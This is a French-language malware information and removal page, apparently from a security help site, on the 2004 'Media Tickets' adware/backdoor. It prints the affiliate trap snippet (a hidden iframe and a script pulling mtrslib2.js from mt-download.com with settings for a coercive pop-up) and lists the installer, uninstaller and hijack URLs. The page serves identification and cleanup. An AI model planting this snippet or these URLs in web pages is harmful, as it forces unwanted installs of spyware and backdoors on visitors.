Media Tickets
  • Résumé : Media Tickets - un piège insérés sur des sites et des e-mails (trapped sites).
  

Media Tickets


Media Tickets
   
suppression, effacer, effacement, supprimer, virer, détruire, désinstaller, désinstallation, get rid of, uninstall, remove, removal, tool, delete


Alias :   Media Tickets, W32/Rbot-BB
TR/Dldr.Mediket.C.3 [Antivir - pour l'installeur]
DR/PurScan.B [Antivir - pour l'applet Java]
JS:TrojDnldr-1 [Avast]
JS/Adware-PurityScan [McAfee]
Adware/MediaTickets [Panda]
Trojan/PurityScan [The Hacker]
JS.DL.MediaTickets.B [VirusBuster]
Classes :   Adware, Spyware, Backdoor, Downloader, Hijacker (homepage), trojan
Risque :
Editeur :   MediaTickets
Daniel Houston
545 Concord Avenue
Cambridge MA 02138
US
Phone: 617-661-9966
Email: dan@mediatickets.net
Découverte : Repéré le 06.05.04. On peut voir dans le code source de l'applet Java, des signatures de modifications datant des 4/7/2004 et 15/7/2004
Installation : La société Media Tickets propose aux webmasters (propriétaires de sites Internet) et aux internautes d'insérer un script dans les pages de leurs sites ou dans les e-mail pour les piéger. Ces pièges, s'ils sont déclanchés (clic de celui qui reçoit le piège) rémunèrent celui qui a installé le piège (0,15 US$ au clic). Ceci se fait en utilisant un iFrame caché lançant l'installation d'une applet Java de 9,83 Ko (10 069 octets) (le 21.07.04).
Contenu de l'iFrame caché (c'est la partie du piège que le webmaster installe sur les pages de son site) :
<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
<script language="JavaScript">
mtrslib_uid = '1234';
mtrslib_retry = 3;
mtrslib_retry_text = 'You must click Yes to access this content.';
mt_set_onload();
</script>


Commentaires sur les passages d'arguments :
mtrslib_uid = '1234'; (ceci est le paramêtre codant l'identification du site affilié)
mtrslib_retry = 3; (ceci est le paramètre codant le nombre de répétitions de l'affichage de la pop-up)
mtrslib_retry_text = 'You must click Yes to access this content.'; (Ce text peut être personnalisé par le Webmaster dont, par exemple, dans la langue de sa cible de visiteurs)


L'applet Java chargée (le fichier mtrslib2.js) lance des affichages de pop-ups irritantes, à intervalles réguliers très rapprochés (1 minute et 4 fois de suite par exemple, au choix du Webmaster qui installe le piège). La pop-up peut être affichée soit à l'entrée dans un site (on load), soit à la sortie d'un site (on unload), soit chaque fois que l'internaute clic sur un lien. La fenêtre en pop-up est totalement bloquante dans votre activité et vous demande de faire confiance en "Media Tickets" en vous faisant croire que vous devez utilisez quelque chose (comme un plug-in) pour voir le contenu du site visité "MediaTickets to view content on this site?". Si vous cliquez "Non", alors une autre popup apparaît prétendant que vous en avez besoin afin de continuer. Si vous fermez cette popup alors la première revient et le cycle continue. L'internaute, irrité et cherchant à s'en débarraser, fini par cliquer sur le bouton "Oui" d'installation.
L'applet mtrslib2.js renommée en .txt pour ceux qui veulent l'étudier.

Un fichier compressé (.cab) est alors téléchargé, d'une taille de 96,9 Ko (99 251 octets) (21.07.04) à partir de http://www.mt-download.com/MediaTicketsInstaller.cab.
Le contrôle MediaTicketsInstaller.cab renommé en .txt pour ceux qui veulent le décompresser et l'étudier.

Ce .cab est décompressé est exécuté. Il semble faire 2 choses :

il installe à son tour le controle ActiveX MediaTicketsInstaller.ocx avec la CSLID 9EB320CE-BE1D-4304-A081-4B4665414BEF

il installe des fichiers .crl, ce qui est curieux car ces fichiers sont, normalement, des fichiers contenant des listes de certificats révoqués et ils semblent provenir de sites plutôt de confiance (bien que souvent mis en doute), engagés dans la délivrance de certificats numériques. Pourquoi ces opérateurs, qui ont pignon sur rue, feraient appel à un marchand d'installations piégées pour détruire des certificats sur nos machines, en cachette ? Les fichiers .crl suivants sont installés.

http://crl.thawte.com/ThawteCodeSigningCA.crl
http://crl.thawte.com/ThawtePremiumServerCA.crl
http://crl.verisign.com/ThawteTimestampingCA.crl
http://crl.verisign.com/tss-ca.crl
Une adresse e-mail chez thawte.com à premium-server@thawte.com
Le site Verisign http://ocsp.verisign.com

On trouve également un lien vers la page de conditions d'utilisation (sic) de Media Tickets à http://www.mt-download.com/terms.html
Un site de Media Tickets à http://mediatickets.net

Remarque : on note, chaque fois, la présence d'un virus de la famille W32/Rbot (dénomination Sophos) qui semble avoir précédé le hijack de la page de démarrage d'Internet Explorer vers des sites, au hasard, contenant le piège Media Tickets.

HiJack vers http://www.unixshellz.info/antitrust (page qui actuellement sort en erreur 404 avec un web-bug dans la page d'erreur 404, web-bug devant servir à comptabiliser les installations du backdoor car il est tagué d'un identificateur : <img SRC="http://geo.yahoo.com/serv?s=19190039&t=1090528606" ALT=1 WIDTH=1 HEIGHT=1>

HiJack vers http://www.angelfire.com/co4/nubnub/error.html
Affectés :   S'installe en tant que BHO (donc n'affecte que Internet Explorer et tous les navigateurs basés sur un noyau Internet Explorer) sous les systèmes Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
Epargnés :   Les systèmes d'exploitation DOS, Linux, Macintosh, OS/2, UNIX
Les navigateurs basés sur le noyau Gecko (Mozilla, Netscape), Opera
Activité :   Le seul moyen de se débarrasser de l'envahissante pop-up, hormis avoir un proxy local filtrant le flux entrant ou un firewall bloquant les objets de type applet Java, est d'accepter, en cliquant sur "Oui".
Vie privée : Lui-même non, mais installe un backdoor et downloader qui va (système pyramidal) installer ce qu'il veut sans que nous en ayons connaissance et sans pouvoir nous y opposer.
Faille :   La permission d'utiliser les iFrames est à la base de l'infection. En aval, cette malveillance crée des failles dramatiques de sécurité dont l'installation d'un backdoor et d'un downloader.
Instabilité : Pas de connue.
Conséquences : L'éradication est sans aucune conséquence sur le bon fonctionnement de tout le reste.
Précautions : Réglage de l'antivirus au maximum
Sauvegarde de la base de registre
Désactiver les points de restauration
Redémarrer en mode sans échec





Eradication automatique
    Scan avec votre antivirus
    Si vous avez un antivirus, utilisez-le, sinon télécharger BitDefender Pro ou Kaspersky AVP maintenant. Le scan doit se faire après avoir désactivé les points de restauration puis avoir redémarré en mode sans échec, avec un paramétrage de votre antivirus tel que tous les types de fichiers sont scannés (y compris les fichiers compressés (archives .zip, .rar, .cab etc. ...)). Scanner et détruire tous les fichiers trouvés. Les antivirus ne sont pas des anti-trojans et n'arrivent pas à éradiquer complètement les parasites non viraux dont ils s'occupent. Une intervention manuelle est souvent nécessaire. S'assurer d'avoir un antivirus paramétré à son maximum puis lancer le scan.
    On note, chaque fois, la présence d'un vers (worm) de la famille W32/Bot qui semble précéder le hijack d'Internet Explorer vers des sites piégés avec Media Tickets.


    Analyse avec votre anti-trojan
    Si vous avez un anti-trojan, utilisez-le, sinon téléchargez PestPatrol ou a² personnal ou The Cleaner Pro ou Tauscan maintenant. Le scan doit se faire après avoir désactivé les points de restauration puis avoir redémarré en mode sans échec, et avec les réglages poussés au maximum (voir mode d'emploi de PestPatrol en français). Scanner et détruire tous les objets malicieux trouvés. En version d'essai, illimitée dans le temps et autorisant les mises à jour, PestPatrol effectue seulement la détection complète mais pas l'éradication. A charge pour vous de faire l'éradication à la main.


    Eradication en utilisant l'outil proposé par l'auteur du parasite
    Vous pouvez utiliser cet outil mais, dans la mesure ou son auteur est également l'auteur du parasite, toutes les réserves sont faites quant-à l'inocuité de cet utilitaire.
    http://www.mt-download.com/mt-uninstaller.exe


    Action préventive contre le script qui initie ce parasite
    Ce parasite est conduit par un script. L'usage d'un proxy local bien paramétré aurait intercepté ce parasite dès l'entrée du flux piégé et l'aurait nettoyé à la volée, avant que celui-ci ne soit mis à la disposition de votre navigateur, vous autorisant une navigation fluide et sûre même sur des sites piégés. Téléchargez maintenant, par exemple, SpyBlocker ou The Proxomitron.


    Action préventive contre l'installation sauvage de contrôles ActiveX
    Précaution : ce parasite a installé un contrôle ActiveX. Si vous aviez paramétré Internet Explorer pour être informé de cette tentative, vous auriez pu vous y opposer. Lisez ces 2 pages et appliquez les conseils - ActiveX - Anti-ActiveX.

    Prévention : les contrôles ActiveX hostiles sont identifiés par leur clé unique d'enregistrement dans la base de registre. Grâce à une technique appelée "Kill Bit", il est possible de prévenir l'installation de ces contrôles ActiveX. Téléchargez et installez immédiatement SpyWare Blaster ou SpyWare Stopper.

    Prévention : cette méthode est radicale et définitive contre les parasites de type ActiveX et contre ceux dont l'installation est conduite par un contrôle ActiveX - installez et utilisez Mozilla pour naviguer et laissez tomber définitivement Internet Explorer et ses technologies non standard, cause de la majorité des maux sur Internet.

Eradication manuelle


Cordialement
Pierre Pinard


Je vous ai aidé ? Merci de m'aider à poursuivre.
Soutien et donnations


Rédigé en écoutant :